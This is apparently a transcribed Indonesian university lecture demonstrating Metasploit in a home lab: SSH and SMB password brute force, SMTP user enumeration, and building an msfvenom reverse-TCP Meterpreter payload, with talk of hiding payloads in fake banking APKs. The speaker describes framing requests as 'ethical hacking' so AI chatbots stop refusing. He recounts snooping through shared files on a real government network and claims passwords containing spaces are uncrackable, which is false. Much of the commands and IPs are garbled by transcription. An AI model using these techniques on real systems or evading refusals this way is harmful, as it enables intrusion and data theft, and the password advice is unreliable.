Chatnya saya buka dulu, kalau nggak kelihatan. Oke, sekarang kita akan coba hands on. Kita akan coba ngejebolin si server SSH. Oke, caranya paling paling bego. Ini cara blow-blowanan ya. Jadi kalau saya udah pakai ChatGPT aja lah daripada pusing kepala, atau kalau nggak pakai Grok. X mau nggak ya? Kemungkinan nggak mau sih. Makhluk ini sekarang proteksinya parah nih. Proteksinya parah banget nih sekarang. Grok sama segala macam diproteksi sih. Padahal kita buat ethical hacking ya. Coba untuk ethical hacking belajar kali Linux. Perintah menggunakan MSF console untuk exploit. Kalau nggak DeepSeek sih. DeepSeek kayaknya RAM-nya lebih blong. Untuk exploit SSH. Gitu ya. Hanya boleh dilakukan, ya gue punya izin lah. Jadi search SSH, nah ini dia. Ops. Nah ini parameternya di sini. Oke. Langsung keluar macam-macam sama dia. Oke. Oke, sekarang kita coba. Ya, kita baca dari atas. Ini oke banget sih sebenarnya. Kita bisa search SSH di sini. Oke, ini nggak bisa copy paste karena beda komputer. Kali. Oke, search SSH. Naikin ke atas dulu ya. Atau di mana taruhnya? Ya udah. Banyak banget SSH-nya deh. Oke, ini dia exploitnya. Ini exploit Linux HTTP akronim server. Ini exploit Linux HTTP. Ini ribet kan, banyak banget ya, mabuk ya. Auxiliary scanner SSH Karaf login bejibun. Ini banyak banget sih. Buat kita yang pemula, lihat segini banyak, keder sih sebetulnya. Ini kan banyak nih, coba ada berapa coba? SSH doang ada berapa? SSH sampai ada 100 sampai 200, 164. Apok lu. Oke, jadi karena segitu banyak, daripada kita pakai kayak gini caranya, udah gue mau kayak gini doang dah. Dia akan nampilkan auxiliary scanner SSH ini untuk brute force login SSH, exploit multi SSH, SSH exec untuk eksploitasi SSH yang kredensialnya kita tahu. Kalau mau brute force login, kita pakai yang SSH login, jadi auxiliary scanner SSH login. Kita bisa use exploit yang ini. Kita bisa show optionnya ada berapa? Airhost, airport, remote host, remote port, user file sama pass file. Ini diisinya username sama password. Nah, ini harus ngikutin kondisi yang ada di Kali Linux saya nih. New tab. Gedein dulu. Gimana cara gedein? View, zoom in. Zoom in. Oke. Ini dia. Jadi ada di user share word list. LS. Ada RockU. Ini yang salah satu yang favorit sih. RockU. Oke. Kita perlu dapetin username-nya sih sebetulnya.
cuman username kadang-kadang bisa dapat lebih gampang. Misalnya kita monitoring pakai OSINT ya, Open Source Intelligence, kita bisa tahu username yang ada di server itu apa aja. Oke. Kan orang pakai kirim email, kirim-kiriman email satu sama lain. Atau kadang-kadang orang posting, kalau menghubungi saya, silakan posting ini email saya. Nah, itu kan dapat username-nya sebenarnya. Tinggal password-nya yang kita jebolin pakai Rockyou. Kita lihat Rockyou. Nih isinya cuma teks seperti ini. Ini ya. Kalau udah ngelihat password seperti ini, berarti kita tahu. Kalau mau aman, nih perhatiin passwordnya gombal semua nih. Satu kata doang, nggak ada spasi. Kalau mau aman, passwordnya pakai spasi. Udah susah dijebol. Jadi password pakai spasi doang sih sebenarnya. Buat nyelamatin diri, passwordnya pakai spasi. Udah, beres. Gak akan bakal susah banget. Oh, ini ada yang saranin pakai Cewel buat generate word list. Oke. Salah satu teknik buat generate word list bisa pakai Cewel, C-E-W-L. Logika berpikirnya Cewel adalah dia akan scraping, akan ngecek. Misalnya kita kasih tahu website si siapa gitu, sasaran kita yang ini websitenya dia sebenarnya. Media sosialnya dia, medsosnya dia yang ini. Pakai Cewel dia akan scraping si web tadi, diambil semua kata-kata yang ada di medsos itu, dia akan mulai ngira-ngira kayaknya ini kata yang sering dipakai ini. Nah, kata-kata itu dimasukin jadi bagian dari word list tadi gitu. Karena orang punya kecenderungan untuk pakai kata-kata yang berhubungan sama dia, keluarganya dia, lingkungannya dia, pakai kata-kata itu dia akan pakai kata-kata seperti itu, kira-kira kayak gitu. Cuman kemarin teman-teman udah nyaranin, udahlah paling gampang pakai spasi aja dah, udah pasti susah ngejebolnya, kira-kira gitu sih. Karena ini semua word list nggak ada spasinya, jadi jarang banget word list yang pakai spasi itu, hampir nggak ada sih. Coba ya, ini kok nggak bisa di enter sih sekarang. Oh bisa, coba gua bikin user ya, add user, add user, misalnya percobaan. Bikin user namanya percobaan ya. Passwordnya saya bikin ini spasi password spasi susah, enter. Ini spasi password spasi susah. Anjir, masuk, mampus lu. Ini nggak bisa dijebol nih, karena ada spasinya. Oke. Bisa nggak gua login ke situ ya? Caranya masuk gimana? Login. Percobaan. Oh, nggak mau. Nggak mau. Saya harus keluar dulu. Bentar nih. Ini sorry iseng ya. Ini percobaan iseng. Aduh, ini harus keluar lagi. Gimana caranya? Nggak bisa, harus keluar. Tapi ini sayang masuk ini dulu, beresin dulu lah. Tapi paling nggak, tadi saya bikin password ada spasinya tembus ya. Jadi saya bisa bikin password pakai spasi. Nah, kalau udah pakai spasi, susah orang nggak nyangka bahwa password kita ada spasi. Jadi satu huruf yang bikin orang nggak pernah nyangka adalah spasi sih sebetulnya. Jadi cara menyelamatin diri sendiri atau nyelamatin orang lain juga boleh, kasih spasi sih sebenarnya udah. Jadi bikin kata-kata biasa aja, tapi ada spasinya, udah nggak bisa dijebol. Segampang itu. Tapi ya tetap aja kalau ada orang yang masang sniffer, ya kelihatan sih sebetulnya. Oke, saya masuk sini, MSF ini, coba kita akan tembusin. Kita akan use auxiliary scanner SSH login ya. Sorry, salah. Use scanner SSH login. Coba dia pilihannya apa lagi sih?
SSH enum git key, SSH login, public key, ke SSH version. Coba version dulu. Version. Oke. Show options. Oke. Saya akan set airhost sama dengan 192.168.0.90. Oh, salah. Oke. Coba run. Run. Jadi kita bisa, keren banget ya. Ini kita ngevaluasi SSH yang dipakai di server 192.168.90. Versinya udah kelihatan nih, SSH 7.6 P1 Ubuntu. Ini nih versinya dia, fingerprintnya ini. Kemudian nilai-nilai dari parameternya kayak gini, dia bisa ngomong pakai SHA 256, SHA 512, apa segala macam, bisa ngomong ke kayak ginian sih. Jadi kita tahu SHA. Nah, sekarang kita use auxiliaries scanner SSH. Ini tadi saya pakai tombol tab ya buat terusinnya. SSH login. Saya pindah exploitnya. Saya akan login, show option. Oke, ini banyak banget optionnya. Kita bisa ngeset berapa cepat brute force-nya. Ini ada password file. Kita perlu ngeset remote host. Remote portnya udah di defaultnya 22 sih. Cuman kalau saya lagi ngoperasin server di internet, saya nggak akan pakai port 22, dijamin halal. Jadi portnya pasti bukan 22 kalau saya pakai di internet, dan kemungkinan besar saya nggak akan pakai SSH sih. Saya tidak akan pakai SSH. Kalaupun pakai SSH, portnya nggak akan 22. Supaya buat nge-remote saya nggak pakai SSH sih. Terus kita akan coba pakai coba. Jadi saya akan airhost-nya saya set dulu ya. Set airhost 192.168.0.90. Oke. Airhost sudah di set. Sekarang kita akan set user file. Mana dia? Airhost user. Oh, username-nya aja kayak set username ono. Jadi username-nya di set ono. Sekarang tinggal password yang kita pakai pass file ya. Set pass file. Nah, ini pass filenya harus ngikutin yang ini sebenarnya. Gedein dulu ya. Mana sih? Zoom in. User share word list. Oke. User share word list, terus namanya rockyou.txt. User share word list pakai S ya. rockyou.txt. Enter. Oke, udah. Kita udah set airhost, username-nya saya pakai ono, pass filenya user share word list rockyou. Run. Dia nyoba brute force. Oke. Dia mulai ngomong dari 95 ke 90. Oke. Tapi rockyou gede loh filenya. Masa nggak ketemu ya? Padahal gampang, passwordnya 12345.
Kan tadi ada 1,45 paling atas ya, makanya saya santai. Taunya lama. Berarti saya harus ganti kayaknya. Aduh, lama. Lama ini mah. Rese. Bego. Padahal udah paling atas. Kenapa dia loncat-loncat ke bawah-bawah? Ini pasti ngerandom dia ngambilnya. Parah. Coba saya bikin file baru lah. Saya bikin file baru aja ya. 1, 2, 3, 4, 5, 6. 1, 2, 3, 4, 5, 6, 7. 1, 2, 3, 4, 5, 6, 7, 8. 1, 2, 3, 4, 5, 6, 7, 8. 9. Oh no. Jangan lama gitu ya. Deh terus karena seru. Alah, resek. Ini harus pakai dulu, sudo vi jang. Harus pakai su. Kamu pakai su kagak mau dia. Nggak mau nge-write. Bisa. Salah. Passwordnya kali. Oke. 1, 2, 3, 4, 5, 6. 1, 2, 3, 4, 5, 6, 7. 1, 2, 3, 4, 5, 6, 7, 8. 1, 2, 3, 4, 5, 6, 7, 8, 9. Jangan pakai lama. Dah. Cuman segitu ya. Ya, ini mendingan dipakai public key, private key, ya betul. Jadi harus public key, private key-nya harus di-set. Tapi itu catatan caranya ada di sini ya. Kalau public key, private key nggak bisa dijebol sih. Center, SSH. Automatic login. Ini ada automatic login. Nah, ini kita bisa ngeset nih. Kita generate key-nya, di generate DSA RSA ini. Kemudian DSA RSA-nya ditransfer ke sebelah sana, ke server sebelah sononya. Kemudian kita copy. DSA RSA-nya kita copy ke authorized key. Jadi kita udah nggak pakai password lagi, kita pakai public key. Public key-nya yang kita nanti dia ngecek. Oh, orang ini ada public key-nya. Kita yang punya private key-nya kan. Nanti dengan key tadi kita bisa masuk. Jadi tekniknya yang ini sih sebetulnya buat masuk. Oke. Jadi bisa dibaca-baca yang di sini, bisa dicobain. Nah, kalau yang ini nggak bisa dijebolin. Jadi tekniknya kayak gitu sih, pakai key. Itu ya, itu lebih susah ngejebolnya, itu puyang kepala tuh yang ngejebolnya. Oke. Nah, ini udah, bentar, ini masuk mana tadi? Oke, kita udah kasih nama jang.txt, nggak bisa tembus, Ctrl C dulu ya. Oke, ini saya rubah set passnya ke jang.txt. Oke, run. No, langsung dapet tuh. Kagak. Oh, dapat nih, sukses. Ini dia. Sukses. Ya sukses lah. Orang passwordnya gue kasih pendek. Jadi sukses ya. Oke. Jadi dia tahu user ID-nya 1000, grup ID-nya 1000, terus dia Ono ini bisa jadi CD-ROM, jadi sudo, jadi apa segala macam kelihatan di sini. Jadi kalau udah jebol ini kita tahu dia bisa jadi sudo. Yang penting yang ini nih. Oh, ini paling penting nih. Bisa jadi sudo atau bisa jadi admin. Nah, udah masuk dah tuh. Bisa asik dah. Itu ya. Jadi itu aja sih. Ini SSH. Coba kita cek yang lain, yang lucu-lucu aja sih. Jadi ini udah di sini. Coba coba kita cek ini ya, file sharingnya ya.
untuk exploit file sharing. File sharing SMB. SMB adalah file sharingnya Windows. Oke. Kalau kita masuk ke jaringan yang banyak komputer Windows-nya, seringkali komputer Windows akan melakukan file sharing. Apakah itu folder, apakah itu printer, atau apalagi. Pokoknya pakainya SMB ini. Nah, ini kita bisa bikin yang lucu-lucu. Ini ada kisahnya sih. Jadi, ceritanya adalah saya lagi ngajarin pakai MSF Console di salah satu instansi pemerintah lah, belajar hacking di salah satu instansi pemerintah. Dan ini masuk ke jaringan beneran, jaringan intranet si pemerintah tadi ya. Jadi udah masuk, udah gitu kita cek file sharing SMB-nya di jaringan kan bisa ngecek yang file sharingnya kebuka siapa aja. Udah kita bisa lihat. Oke, udah kebuka, udah gitu cek username apa, passwordnya apa, sharingnya apa, akhirnya bisa masuk nih. Ini bayangin masuk, nah, udah tahu sendiri lah. Kalau orang-orang dewasa kan yang di-sharing file yang gelo-gelo gitu kan ya. Masuk lihat file kayak gitu. Aduh, asik dah. Langsung konak semuanya. Kira-kira kayak gitu deh. Oke, ini kita udah masuk SMS Console, kita search SMB. Ini kalau kita nah ini kita bisa SMB versionnya. Kalau ini ya ke window langsung Eternal Blue, karena ini bukan window, kita kayaknya nggak akan bisa tembus kalau Eternal Blue. Parah ini. Wah, kacau ya. Ini kacau nih. Ini kacau nih. Kita bisa pantesan ini favorit ya, sialan. Ini kita bisa ambil alih, kita bisa masuk ke shell-nya Windows sih kalau yang ini. Ini shell-nya Windows kita bisa ambil nih. Gitu ya. Parah. Oh, ini buat lihat kerentanannya aja. Tapi ini kita nggak bisa ini soalnya file sharingnya bukan Windows. Ini bukan file sharingnya bukan Windows ya. Jadi, oh ini kalau udah berhasil masuk ke Windows-nya udah kita bisa nulis yang ini dalam Windows ya. Udah di dalam mesin sebelah sana nih. Nah, saya mungkin yang akan saya kerjakan yang ini aja ya. Enum share-nya apa aja yang ada di situ, kemudian username password-nya apa, terus bisa masuk ke sebelah sana. Oke, saya akan yang ini aja. Tapi sebelumnya saya akan scanning. Ini search SMB. Bisa scan nggak ya? Ya inilah search SMB dulu ya. Saya akan masuk dulu ke sini. Terus search SMB. Aduh, gila banyak loh, 400. Banyak banget. 400 mah mabok bacanya. Bacanya setengah mati kalau 400 mah. Oh ini. Yang menarik mah ini. SMB version. Enum users. Ada enum share. Ini yang kayak gini-gini ya. Auxiliary scanner SMB sama enum users. Ini dua ya. SMB enum share, SMB enum user. Saya coba yang sama version dulu lah. Use auxiliaries scanner SMB version. Set airhost 192.168.090 run. Nah, kagak keluar. Actually complete cuma gitu doang keluarnya, sialan. Coba gue balikin lagi. SMB enum users.
host. Oke, run. Kok nggak keluar sih? Wih, walah. Oke, saya ganti host deh. Jadi dia refuse, was refused by remote host. Jadi remote hostnya nggak jalin SMB, berarti oke. Saya coba lagi ngerjain yang version. Remote hostnya saya ganti ya. Remote hostnya ke 9. Oke, run. 9 tuh. Oke, ini kelihatan. SMB detected. Versionnya 1, 2, 3. Bisa dia pakai SMB 1, SMB 2, SMB 3. Prefer dialect SMB 311. Encryption capability ini authentication domainnya Candice. Nah, ini servernya ada di kaki saya. Ini sebetulnya ini bentuknya NAT lagi apa? NAS, Network Attached Storage. Oke, pakai Intel Atom. Oke, coba kalau kita cek ininya, enam usernya, enam users, kita set R hostnya ke 9 juga, coba kita run. Oke, dia berhasil lihat usernya namanya Ono. Oke, ini kelihatan nih, usernya Ono nih kelihatan nih, usernya. Cuman passwordnya nggak tahu. Ntar kita cek passwordnya. Kita pengen lihat enam share-nya apa lagi. R hostnya di set, nggak usah di set, udah kita set ke 9 semua sih. Coba kita run. Dia share-nya apa aja nih? Share-nya dia ada media 2, ada USB, ada share 1 dan sebagainya. Ini share-nya semua. Sebenarnya dia bisa juga diajak ngomong ke printer, tapi printernya nggak dicolok. Coba kalau saya nyoba ke R hostnya 4, mau nggak? Tapi ini dia nggak pakai SMB sih buat printernya. Ini 4 tuh adalah printer server saya di rumah sih sebetulnya. Tapi dia nggak pakai SMB sih. Coba. Bisa nggak keluar? Nggak keluar. Nggak keluar. Jadi soalnya dia makainya Apple apa-apa gitu. Ini pakai Linux sih, pakai OpenWRT printer servernya. Oke. Sekarang share-nya udah dapat, usernya udah dapat, tinggal passwordnya aja yang belum dapat. Bisa nggak dijebolin passwordnya? Gimana caranya ngejebolin password? Ini dia. Iya. Jadi SMB user sama SMB pass. Oke. Jadi saya akan nih use auxiliary ini auxiliary scan SMB enum share. Oke, tapi saya set username passwordnya. Oke. Salah. Salah. Ini ya. Set sorry. Use auxiliaries scanner SMB enum share. Oke. Set R host 192.168.09. Oke, udah. Set SMB user Ono, karena udah ketahuan Ono tadi. Set SMB password. Nah, ini mau nggak gini? User share word list jam. Mau nggak digini nih? Nggak tahu nih. Mudah-mudahan bisa. Run. Nggak mau dia. Coba set SMB passwordnya. Saya lupa passwordnya apa. Kalau nggak salah kayak gini sih. Run. Mau.
Cuman ini kan satu-satu ya. Kalau pakai file gimana caranya? Coba set SMB pass. Coba kalau kayak gini mau nggak? Gua nggak bisa ya. SMB pasnya nggak bisa, file matang lah gue. Satu-satu mah sama juga bohong dong. Kalau tahu passwordnya kayak tadi ya gampang, kalau nggak tahu kan berabe, harus pakai file. Ya udah, kondisinya gitu. Coba tanya ke ChatGPT. Cara set SMB pass menggunakan file. Bisa nggak? Di password txt, Microsoft Console, SMB login. Oh, user file. Dia makanya user file di sini. Oh. Set pass file. Oke. Percobaan ya, percobaan. Nggak tahu. Saya mah suka iseng-iseng gitu doang. Tapi jujur ya, saya sendiri nggak pernah bisa ngapal perintah, udah tua kali ya. Jadi saya kesulitan buat ngapal perintah. Jadi cara yang biasa saya pakai ya udah saya cari di ChatGPT aja sih udah. Tapi yang penting kita tahu logika berpikir aja. Terus apa yang harus ditanya? Nah, sekarang saya akan set pass file. Itu harus dimatiin lagi. Set. Oh. Use auxiliaries scanner SMB login. Nggak mau nih login. Oh, ada login. Oke. Udah login dari set. Sekarang set airhost 192.168.09, set SMB user ono, set pass file, user share word list jump. Oke, udah run. Oh, ini dia bilang 1-2 gagal, 7 gagal, 8 gagal, ini sukses nih, berhasil, dapet. Jadi berhasil. Jadi caranya gini sih ternyata, airhost, SMB user, pass file, run, langsung dites. Kira-kira gitulah teknik-tekniknya. Kalau kita pengen evaluasi mail server, coba kita cek caranya evaluasi mail server pakai ini bisa nggak? Untuk ethical hacking menggunakan MSF Console evaluasi SMTP server di IP 192.168.090. Oke. Dia ada di port 25.465.578. Yang saya adanya 25 doang karena nggak diaktifin buat security-nya. Nah, caranya MSF Console, Auxiliary Scanner, SMTP, SMTP version, airhost, terus port, run. Oke. Oke, ini buat ngecek ada user apa aja sih di situ, gitu ya. Dia pakai
modulnya user scanner SMTP SMTP 6. Sekarang saya akan masuk ke SMTP version dulu. Oke. Jadi tekniknya pakai ChatGPT sih sebetulnya. Nah, yang seru dari kisah ini adalah kita bisa lihat ChatGPT bisa generate makhluk-makhluk ini nih. Parameter-parameter ini bisa di-generate sama ChatGPT. Konsekuensinya, kalau kita bisa pakai LLM bisa pakai N8N, N8N kalau bahasa kerennya, N8N, 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 buat ngomong. Jadi si Olama, kalau kita pakai LLM-nya LLM-nya Olama disambungin pakai N8N ngomong ke MSF Console. Parameter MSF Console-nya bisa dikontrol pakai LLM sih sebetulnya. Konsekuensinya adalah kita bisa melakukan pentestnya pakai AI. AI-nya tuh LLM sih sebetulnya. Ini kan LLM-nya dibaca sama manusia dulu, manusia yang masukin ke dalam si MSF Console ya. Nah, kalau yang lebih sadisnya adalah si LLM sama MSF Console-nya ngomong tektokannya cepet gitu, tanpa manusia. Nah, itu yang dilakukan sama anak-anak yang kemarin pentas di DPR RI. Jadi DPR RI kemarin dipentas sih sama anak-anak. Mereka yang minta, bukan kita ya. Jadi kitanya sih biasa-biasa aja sih. Merekanya minta, ya udah pakai AI. Waktu pakai AI jebol sih. DPR RI-nya bisa jebol. Oke. Ya kita kasih tahu bolongnya di mana, yang harus benerin di mana gitu. Jadi bisa jebol tapi pakai AI. Kalau nggak pakai AI nggak jebol. Jadi udah bagus sih, DPR RI-nya udah bagus. Karena serangan ke mereka tinggi banget DPR RI. Terutama kemarin akhir Agustus kan parah banget nih. Walaupun yang diserang beneran tuh Polri ya. Serangnya parah Polri. Dan datanya bocornya parah sih. Sampai hari ini bocornya gila. Oke, kita akan coba ini auxiliary scanner SMT version. Coba use auxiliary scanner SMTP version, set airhost 192.168.0.90 deh, run. Kita bisa lihat bahwa dia adalah postfix pakai Ubuntu. Versinya nggak dikeluarin, tapi kita bisa tahu itu postfix pakai Ubuntu. Bisa kelihatan di sini ya. Konsekuensi dari sini adalah kita bisa set sebetulnya di servernya supaya ini nggak dikeluarin. Bisa di set. Cuman kalau di set jadinya kan susah saya ngajar. Kalau ini kan ngajarnya enak. Kelihatan kan padahal di set. Di sana dibuka emang. Gitu ya. Nah sekarang kita lanjut. Ini udah bisa yang ini. Oke. Oh ini saya airportnya nggak di set ya. Masih karena defaultnya dia 25 sih. Nah sekarang kita akan coba SMTP 6. Cuman user file name-nya saya harus user saya Metasploit Framework data. Wah, ini kacau kalau ke common user bisa lama nih. Kita bikin coba tadi saya di junk-nya junk-nya udah diisi apa sih tadi? Oke, di sini ada Ono ya. Ada Ono. Dan itu ada user Ono memang di server itu. Jadi kita akan ngecek 12345 ini. Nggak ada sih user 12345 mana ada. Tapi yang ini yang bakal kena nih. Oke. Jadi kita akan kayak gitu. Jadi use auxiliary scanner SMTP. Salah. SMTP 6 ya. 6. Oke. Terus set airhost 192.168.0.90. Terus kita set user file user. Wah, jangan pakai yang ini. User set share watch.
word list, nggak mau dia. Langsung ke sini. Unix, ya nggak mau dia. Jadi saya harus bikin di dalam user share Metasploit framework data word list. Dia nggak mau lari ke tempat lain soalnya. User share data word list. Oke. No, coba tes. Ini user-user yang percobaan aja ya. Saya kasih 3 doang lah. Males nunggu soalnya. Ya, harus sudo lagi ya. Lupa. Ya udah. Sudo. Kali. Sorry, huruf besar. Oke, huruf kecil deh. Oke, sekarang ini kita rubah. Jangan pakai word list. Iyalah. Ini jadi junk. Oke, kita urusin junk. Terus coba kita run. Oke, user found ono. Langsung dapet. Ini pakai email ya. Pakai email dia tahu usernya ono. Coba kalau percobaan mau nggak ya? Tadi kan saya masuk percobaan ya. Di kali Linux itu mah ya. Coba saya bikin user dulu di server sana ya. Ini saya bikin user. Add user percobaan. 1, 2, 3, 4, 5, 6. Males. 1, 2, 3, 4, 5, 6. Oke. Saya punya 2 user, paling nggak ono sama percobaan. Coba kita masuk sini lagi. Oke, cuman saya harus bikin supaya ada percobaan di sini. Percobaan. Bisa nggak dia dapat 2 user sekaligus ya? Cobaan aja sih iseng. Oke. Ininya tetap junk. Kita run lagi. Nih dapat 2. Oke. Jadi ono dapat, percobaan dapat. Padahal percobaan baru saja ditambahin kan. Kita tambahin user di sebelah sana. Dan dia berhasil dapat percobaan. Itu. Jadi kira-kira teknik-teknik hackingnya kayak gini. Kalau pakai Metasploit framework. Kira-kira gitu sih. Jadi udah enak banget. Nah, yang seru dari Metasploit framework adalah sebetulnya parameternya bisa kita ubah seenak jidat sih. Show option ya. Ini optionnya bisa dilihat. Ada banyak optionnya di sini. Dan ini option-option ini bisa kita rubah-rubah seenaknya. Contoh, ini ya, user file name-nya kan bisa macam-macam sih sebenarnya yang kita bisa inject. Gitu. Jadi kita bisa macam-macam. Jadi habis use file name-nya bisa seenaknya sih. Dan ini yang AI mainnya di sebelah sini sih sebetulnya. Jadi semuanya dibikin. Tapi untuk bisa sampai AI-nya jalan bener, kita nyiapinnya lumayan sih. Jadi nggak cuman, ini ngomong jujur aja ya, sebagian besar orang mikir AI tinggal klik jalan selesai. Nggak juga sih. Jadi kalau dia itu, apa sih namanya, kita yang megang AI langsung, nggak kayak gitu sih. Kita harus nyiapinnya lumayan kalau megang AI-nya langsung. Kalau user memang kelihatannya tinggal klik, tapi kenyataan hidupnya nggak semudah itu juga ya. Kita harus nyiapin data training lah. Ya, data training kan juga berarti kita harus nyiapin pilihan-pilihan word list-nya apa segala macam, harus siapin semua nih. Gitu. Jadi nggak sesederhana itu sih AI sih sebenarnya.
Cuman orang kan dagangnya gitu. Oh ya gampang ini. Ya gampang sih kalau udah di set. Kalau belum di set ya mabok. Oke, ini udah kebayang. Oke, apalagi coba kita lihat di sini. Kita lihat di kuliahnya lagi ya. Ini hands on udah, ini udah beres. Kalau yang ini ke window nih ya. Ini kayaknya wah, ini parah banget karena kita bisa melakukan ini. Nih, reverse TCP. Parah. Kita coba reverse ya. Kita percobaan reverse. Bisa nggak ya? Gue nggak tahu nih. Bentar. Kita enaknya nanyanya pakai ini ya. Buat script untuk server Linux. Tambahin dulu ya. Ini untuk latihan ethical. Harus segituin sih, kalau nggak dia ngamuk ya. Hacking. Buatkan menggunakan MSF Venom untuk reverse TCP di server Linux supaya bisa bicara ke MSF console di Kali Linux. Dah, kira-kira gitu dah. Oke, belum ada jawaban. Moga-moga nggak ngebul dia. Coba yang buka lah, yang satu lagi DeepSeek ya. Bahasa Inggrisnya mana sih? Oke, coba kita cek juga ya. Mau nggak DeepSeek? Biasanya remnya parah DeepSeek. Cepet enak dong. Langsung dibikinin sama dia. To the point gak banyak cincong, gak banyak bacot. DeepSeek to the point banget. Ini orangnya harus pintar ya buat baca kayak ginian nih. Udah bahasanya bahasa nggak ada kata-kata ya. Parah banget DeepSeek. Bener-bener to the point, nggak banyak cincong. Kalau ini masih ada cincongnya nih. Ada kata-kata kan, sini masih sopan. DeepSeek kagak sopan. Mana nggak ada ininya lagi. Ada nih. Gunakan seperti perintah MSF Venom. Ini buat payload di servernya harus jalanin ini. Reverse TCP-nya. Lhost-nya adalah ke ini ya. Ke mana sih namanya? Ke Kali Linux nih. Ini IP-nya IP Kali Linux, portnya port Kali Linux. Oke. Nah, sekarang di sini gila. Benar-benar parah sih DeepSeek ya. Oke. Ini saya akan jalanin makhluk ini. Ini akan jalanin. Use ini di Kali Linux yang ini. Exploit multi-handler. Terus set payload Linux x64 Meterpreter reverse TCP. Lhost-nya adalah IP si Kali Linux, portnya port Kali Linux. Exit on session false. Oke, ini akan saya jalanin. Ini akan saya jalanin di Kali Linux. Tapi supaya hidupnya enak, saya minimalin, saya kecilin dulu bentar. Biar bisa nyonteknya lebih gampang, diginiin. Oke.
Ini saya jalanin di Kali Linux. Oke, cuman biar enak hidupnya. Ya udah ini gini aja, biarin aja. Atau sebelum yang itu saya harus bikin ininya dulu ya. Payload buat di servernya. Oke, ini tetap di situ nggak apa-apa. Saya masuk ke arah sini. Ini dia. Nih. Oke, MSF Venom -P itu payload. Linux x86 Meterpreter reverse TCP, L hostnya 192.168.095. Ini 95 portnya. L portnya 444 -F elf base 64 W0. Oke. Sekarang saya akan bikin di sebelah sini. Nih dia. Oke. Saya gedein dulu biar enak lihatnya. Zoom in, zoom in, zoom in. Ini bisa aja kalau kita mau ke Windows juga bisa ya. Kalau ini kan tadi Linux ya, karena korban saya kan server Linux. Oke, sekarang sudo dulu. Oke, saya udah jadi super user. Sekarang saya harus jalan ini nih. MSF Venom -P Linux /x64/Meterpreter/reverse TCP. Oke. MSF Venom, oke, -P payloadnya Linux, coba bentar. Linux x64 Meterpreter reverse TCP. Oke, udah. Sekarang perintahnya L host L port -E -F elf. L host (192.168.095) 85 lagi 95. Bener nggak 95 sih? Ntar cari dulu. If config 95 bener. Naikin ke atas dulu biar kelihatannya lebih enak. 95 L portnya sama dengan 444 terus filenya namanya elf -F elf -F. Oke, terus base 64 -W0, cobain. Base 4 bener nggak? Kalau salah harus ulang semua. Elf base 64 -W0 -W0. Ups, ini harus dijadiin file. Gimana caranya jadi file? Oh, ini dia. Ini raw payload. Wah, kacau. Nggak beres. Coba kita lihat yang di sini. Oh, ini dia. Payload elf. Oke. Jadi saya harus bikin payload elf. Ini sama. Cuman ini diganti. Dimasukin ke file namanya payload elf. Oke. Jadi kita bikin elf itu bisa di run di Linux ya. Kalau di Windows namanya exe kali ya. Oke.
Coba clear layar. Wah, saya masuknya ke sini lagi. Saya move dulu ya. Payload F saya pindahin ke sini. Ini ada payload F, SCP payload F. Masukin ke Ono at 192.168.090. Oke. Salah. 192. Jadi harus kayak gini, kasih titik 2, lupa. Titik 2 masuk ke home directory di server IP-nya 192.168.090. Saya masukin passwordnya. Dia transfer ke 90. Ini udah ditransfer. Cuma 250 byte sih sebenarnya payload itu. Karena nggak ada file ininya. Kalau kita punya file, misalnya file APK, APK-nya Windows, APK-nya Android, bisa ditimpa sama APK-nya, bisa dibungkus sama si payload ini sih sebetulnya. Jadi kita bisa pura-pura bikin APK buat banking lah, apalah, dibungkus sama kayak ginian. Kalau ini langsung exe-nya ini langsung ya. Nah, sekarang saya akan masuk ke sini. Oke. Kita akan masuk ke sini. Ini file udah ditransfer, tapi belum di run. Ini saya akan jalanin di Kali Linux. Use exploit multi-handler. Set payload Linux x64 meter per reverse TCP. Lhost-nya adalah 095. Portnya 444. Set exit no session false. Oke. Terus exploit. Ini -j -z boleh ditambahin. Coba kita cobain ya. Use exploit multi handler. Oke. Set payload. Kalau ini generic shell reverse TCP, kita spesifik Linux x86 meter per reverse TCP. Linux. Wow, lemot dia. Wow, ngamuk. Salah pencet. Gak mau dia. Oh, Linux. Apa lengkapnya? Linux x86 meter per reverse TCP. Oke. Payloadnya udah di set. Sekarang lhost set lhost 192.168.095, bukan 90 ya. 90 korbannya. Set lport 444. Salah. 444. 4 biji. Terus set exit on session false. Set exit on session false. Oke. Exploit -j -z. Dia bengong karena belum ada sambungan dari servernya. Sekarang di server kita akan jalanin makhluk itu. Server mana? Sini. Di posisi ada di server, clear layar, ls. Ini ada payload elf, Clamud 777 payload elf. Wih, segmentation Cordam. Coba. Wah, dam lagi. Cuman di sini kan ada nih ya. Session running as background job, no session created, reverse TCP dari 95. Coba. LS. Oh, jalan dia. Enggak, jalan cuma satu perintah doang, udah gitu habis. Kagak bisa. Ini udah LS-nya lokal di sini. Jadi dia berusaha connect, tapi di sana Cordam sih.
Nah, ini kenapa Cordam kagak tahu, harus dicek. Tapi kira-kira kayak gini, kalau kalau dengan cara yang sama kita bisa pakai buat Android, buat apa segala macam, kira-kira kayak gini sih tekniknya. Cuma nanti kalau ini kan tadi Linux ya, ini kan Linux nih. Kalau Android ini ganti Android, kalau Windows. Nanti kita bisa bikin elf tadi buat yang Windows, buat Android apa segala. Kalau Android APK ya. Kalau Android APK nanti kira-kira caranya kayak gini, udah gitu kita bisa connect, udah gitu ya udah kita komunikasi sama si eh, korbannya. Kalau bisa LS, bisa apa, misalnya kita mau SCP kemana, kita ambilin file, terus kita bisa running filenya, ya udah jalan lah udah, gitu. Tapi ini Cordam nih barusan. Kenapa Cordam? Kagak tahu. Tapi kira-kira tekniknya kayak gini, gitu ya. Oke, ada pertanyaan? Aman ya? Oke, tapi saran saya gini deh. Satu, tolong kerjain kuis UTS UAS supaya nilainya bagus dari sekarang. Jangan ditunda sampai akhir semester. Beberapa mahasiswa nunda sampai UASnya udah selesai baru ngerjain open course. Nilainya nggak akan bisa maksimal kalau gitu. Mumpung hari-hari ini mungkin belum tinggi bebannya, kerjain dari sekarang aja sih. Sekarang hari Senin ya. Wah udah telat, harusnya hari Minggu lu, hari Sabtu Minggu, daripada bengong ngerjain ginian gitu. Supaya nilai bagus. Sebenarnya kalau udah nilai bagus saya udah nggak peduli sih sebetulnya. Lu mau ngerjain apa, suka-suka, mau bolos gitu, nggak peduli. Itu satu. Yang kedua, ini ada kesempatan saudara magang, silahkan dikerjain. Terus yang ketiga, ini mumpung mungkin semesternya baru semester bawah ya. Tolong pikirin buat ganti inskripsi. Kalau bisa sih paper jurnal gitu. Saya bantuin nulis, nggak masalah. Cuman kalau bisa startnya dari 